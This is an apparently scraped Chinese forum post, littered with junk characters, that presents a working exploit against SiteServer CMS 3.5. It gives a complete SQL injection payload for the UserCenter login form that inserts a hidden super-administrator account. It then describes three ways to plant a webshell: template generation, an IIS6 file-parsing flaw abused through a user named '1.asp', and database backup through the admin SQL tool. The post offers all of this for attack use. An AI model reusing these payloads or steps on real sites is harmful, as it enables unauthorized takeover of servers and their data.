经测试秒杀最新的3.5版' G2 X3 y" k+ j8 {8 w1 f1 q
stieserver官网:www.siteserver.cn& L/ m2 [- z7 P# R
EXP: f9 ^3 `* O7 m( ^7 D
直接访问UserCenter/login.aspx
l9 H7 H% N- l) _' [" M) F用户名处输入:8 Z7 c r; Y# O8 r& n7 J H1 V; {
7 y- C- l0 D7 V/ q$ M2 ?123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into bairong_AdministratorsInRoles values(‘RegisteredUser’,'blue’);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,'blue’);–
$ g7 {7 U5 B; I2 R2 o! d- H0 Q密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。
# B3 q: O% ^/ @" W2 o$ r E9 M之后再访问后台SiteServer/login.aspx用插入的用户登陆
# I1 B l$ L: \后台拿webshell的三种方法:
b0 U) t) J0 J1 y+ f一、1 ^4 U1 q+ W" Y! ~( A$ k! ?( p
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
5 V l0 T s3 H8 D7 }二、! d1 R) K: x, ~! b
成员权限-》添加用户-》用户名为:1.asp
; W. }% p- C7 s; j- O% `4 R0 B1 z# d) Nhttp://127.0.0.1/usercenter/* h! W3 T' g( a( @
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
+ X2 P& h4 O; z8 k- B! [2 J(ps:后台添加用户时不会验证是否含有非法字符)
- t+ e6 U. E# e$ d三、# x; d$ v4 s4 u3 }; g
系统工具-》实用工具-》机器参数查看
: x$ ^3 h1 p6 n0 G6 ^9 G可以看到数据库类型、名称,WEB路径
- y1 E/ ?! E# f% l2 h0 r系统工具-》数据库工具-》SQL语句查询$ J5 v, S2 Y1 A' n; _
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO |